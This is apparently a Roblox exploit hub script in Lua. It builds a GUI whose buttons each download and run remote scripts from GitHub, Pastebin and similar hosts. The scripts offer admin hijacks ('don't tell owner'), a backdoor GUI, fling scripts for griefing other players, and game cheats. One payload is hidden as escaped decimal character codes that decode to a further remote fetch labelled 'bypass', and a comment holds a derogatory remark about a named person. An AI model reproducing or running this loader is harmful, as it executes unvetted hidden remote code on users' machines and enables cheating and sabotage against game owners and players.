local OrionLib = loadstring(game:HttpGet(('https://raw.githubusercontent.com/shlexware/Orion/main/source')))()
local Window = OrionLib:MakeWindow({Name = "Carl's Gui", HidePremium = false, SaveConfig = true, ConfigFolder = "OrionTest"})

--[[
Name = <The private gui of Carl> - The name of the UI.
HidePremium = <false> - Whether or not the user details shows Premium status or not.
SaveConfig = <true> - Toggles the config saving in the UI.
ConfigFolder = <vip> - The name of the folder where the configs are saved.
IntroEnabled = <false> - Whether or not to show the intro animation.
IntroText = <RIP_Magma is gay> - Text to show in the intro animation.
IntroIcon = <c00lkid> - URL to the image you want to use in the intro animation.
Icon = <false> - URL to the image you want displayed on the window.
CloseCallback = <5> - Function to execute when the window is closed.
]]

local Tab = Window:MakeTab({
	Name = "Carl's Explotis",
	Icon = "rbxassetid://4483345998",
	PremiumOnly = false
})

--[[
Name = <Gui of jump over 100 walls> - The name of the tab.
Icon = <158118263> - The icon of the tab.
PremiumOnly = <true> - Makes the tab accessible to Sirus Premium users only.
]]
local Section = Tab:AddSection({
	Name = "Section"
})

--[[
Name = <hack with this xd> - The name of the section.
]]OrionLib:MakeNotification({
	Name = "THE PRIVATE GUI OF CARL!",
	Content = "By Carl, enjoy!",
	Image = "rbxassetid://4483345998",
	Time = 5
})

--[[
Title = <Look here> - The title of the notification.
Content = <hi> - The content of the notification.
Image = <7> - The icon of the notification.
Time = <10> - The duration of the notfication.
]]
Tab:AddButton({
	Name = "Get admin!",
	Callback = function()
      		print("button pressed")
  loadstring(game:HttpGet('https://raw.githubusercontent.com/EdgeIY/infiniteyield/master/source'))()
end
})
Tab:AddButton({
	Name = "Blade ball gui!",
	Callback = function()
      		print("button pressed")
  loadstring(game:HttpGet("https://raw.githubusercontent.com/REDzHUB/BladeBall/main/redz9999"))()
end
})
Tab:AddButton({
	Name = "Speed!",
	Callback = function()
      		print("button pressed")
  loadstring(game:HttpGet("https://raw.githubusercontent.com/Shugare/Speed/main/S", true))()
end
})
Tab:AddButton({
	Name = "F3x gui!",
	Callback = function()
      		print("button pressed")
  loadstring(game:HttpGet('https://gist.githubusercontent.com/MRSBLACK999/a1521a41ab1d1b67f5073aacce0bce32/raw/432ed275c41a160eca06ca1ad473a67a50168182/Fe%2520F3x%2520Backdoor%2520Gui'))()
end
})
Tab:AddButton({
	Name = "Use in prision life!",
	Callback = function()
      		print("button pressed")
  loadstring("\108\111\97\100\115\116\114\105\110\103\40\103\97\109\101\58\72\116\116\112\71\101\116\40\34\104\116\116\112\115\58\47\47\114\97\119\46\103\105\116\104\117\98\117\115\101\114\99\111\110\116\101\110\116\46\99\111\109\47\103\48\48\108\88\112\108\111\105\116\101\114\47\103\48\48\108\88\112\108\111\105\116\101\114\47\109\97\105\110\47\70\101\37\50\48\98\121\112\97\115\115\34\44\32\116\114\117\101\41\41\40\41\10")()
end
})
Tab:AddButton({
	Name = "Fe punch fling!",
	Callback = function()
      		print("button pressed")
      loadstring(game:HttpGet(('https://raw.githubusercontent.com/0Ben1/fe/main/obf_rf6iQURzu1fqrytcnLBAvW34C9N55kS9g9G3CKz086rC47M6632sEd4ZZYB0AYgV.lua.txt'),true))()
      end
     })
     local Tab = Window:MakeTab({
	Name = "Scripts v2",
	Icon = "rbxassetid://4483345998",
	PremiumOnly = false
})
Tab:AddButton({
	Name = "Nameless admin v2!",
	Callback = function()
      		print("button pressed")
      loadstring(game:HttpGet("https://raw.githubusercontent.com/FilteringEnabled/NamelessAdmin/main/Source"))();
      end
     })
     Tab:AddButton({
	Name = "Fe zombie fling!",
	Callback = function()
      		print("button pressed")
      loadstring(game:HttpGet(('https://pastefy.app/w7KnPY70/raw'),true))()
      end
    })
    Tab:AddButton({
	Name = "fly gui v3!",
	Callback = function()
      		print("button pressed")
      loadstring(game:HttpGet('https://pastebin.com/raw/YSL3xKYU'))()
      end
     })
     local Tab = Window:MakeTab({
	Name = "For Obby",
	Icon = "rbxassetid://4483345998",
	PremiumOnly = false
})
Tab:AddButton({
	Name = "Anti Fall!",
	Callback = function()
      		print("button pressed")
      loadstring(game:HttpGet("https://raw.githubusercontent.com/zephyr10101/AntiFall/main/Script"))()
      end
     })
     local Tab = Window:MakeTab({
	Name = "IQ OBBY",
	Icon = "rbxassetid://4483345998",
	PremiumOnly = false
})
Tab:AddButton({
	Name = "IQ OBBY GUI!",
	Callback = function()
      		print("button pressed")
      loadstring(game:HttpGet("https://raw.githubusercontent.com/Balligusapos/Balligusapos/main/Mybadlmao"))()
       end
      })
      local Tab = Window:MakeTab({
	Name = "Avatar",
	Icon = "rbxassetid://4483345998",
	PremiumOnly = false
})
Tab:AddButton({
	Name = "R15 to r6!",
	Callback = function()
      		print("button pressed")
      loadstring(game:HttpGet(('https://raw.githubusercontent.com/Imagnir/r6_anims_for_r15/main/r6_anims.lua'),true))()
      end
     }) 
     Tab:AddButton({
	Name = "Fe ghost",
	Callback = function()
      		print("button pressed")
      loadstring(game:HttpGet("https://pastebin.com/raw/uUtRsAX5"))() 
      end
     })   
     Tab:AddButton({
	Name = "Fe Dance gui",
	Callback = function()
      		print("button pressed")
      loadstring(game:HttpGet("https://pastebin.com/raw/eCpipCTH"))()
      end
     })
     local Tab = Window:MakeTab({
	Name = "Vehicle Fly",
	Icon = "rbxassetid://4483345998",
	PremiumOnly = false
})
Tab:AddButton({
	Name = "Fe Vfly",
	Callback = function()
      		print("button pressed")
      loadstring(game:HttpGet("https://pastebin.com/raw/MHE1cbWF"))()
      end
     }) 
          local Tab = Window:MakeTab({
	Name = "Spiderman",
	Icon = "rbxassetid://4483345998",
	PremiumOnly = false
})
     Tab:AddButton({
	Name = "Become Spiderman (not sure if fe)",
	Callback = function()
      		print("button pressed")
loadstring(game:HttpGet(('https://pastebin.com/raw/2X0hKUgq'),true))()
end
}) 	
local Tab = Window:MakeTab({
	Name = "Strongest battlegrounds",
	Icon = "rbxassetid://4483345998",
	PremiumOnly = false
})
Tab:AddButton({
	Name = "The strongest battlegrounds gui",
	Callback = function()
      		print("button pressed")
loadstring(game:HttpGet("https://pastefy.app/BKI7MUpH/raw",true))();
end
})
local Tab = Window:MakeTab({
	Name = "Funky Friday",
	Icon = "rbxassetid://4483345998",
	PremiumOnly = false
})
Tab:AddButton({
	Name = "Auto player",
	Callback = function()
      		print("button pressed")
      loadstring(game:HttpGet("https://scriptblox.com/raw/XMAS-Event-or-Funky-Friday-Auto-Player-Mobile-6721"))()
      end
     })
     local Tab = Window:MakeTab({
	Name = "Prison life",
	Icon = "rbxassetid://4483345998",
	PremiumOnly = false
})
Tab:AddButton({
	Name = "Get admin (don't tell owner)",
	Callback = function()
      		print("button pressed")
      loadstring(game:HttpGet("https://raw.githubusercontent.com/dalloc2/Roblox/main/TigerAdmin.lua"))()
      end
     })
     local Tab = Window:MakeTab({
	Name = "Blox fruits",
	Icon = "rbxassetid://4483345998",
	PremiumOnly = false
})
Tab:AddButton({
	Name = "Gui",
	Callback = function()
      		print("button pressed")
      loadstring(game:HttpGet("https://raw.githubusercontent.com/ahmadsgamer2/Zekrom-Hub-X/main/Zekrom-Hub-X-exe"))()
      loadstring(game:HttpGet("https://raw.githubusercontent.com/KazeOnTop/Rice-Anti-Afk/main/Wind", true))()
      end 
     }) 
          local Tab = Window:MakeTab({
	Name = "The end.",
	Icon = "rbxassetid://4483345998",
	PremiumOnly = false
})
Tab:AddButton({
	Name = "Carl's last gui",
	Callback = function()
      		print("button pressed")
      loadstring(game:HttpGet("https://raw.githubusercontent.com/ZhenX201/Admin/main/source"))()
      end
     })
         
